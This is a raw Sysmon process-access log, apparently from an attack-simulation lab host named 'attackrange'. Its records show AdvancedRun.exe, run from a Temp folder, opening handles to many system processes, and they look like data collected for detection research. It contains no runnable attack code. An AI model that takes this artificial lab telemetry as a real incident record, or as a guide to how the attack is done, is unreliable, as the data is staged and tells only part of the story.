19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.229{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004057070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
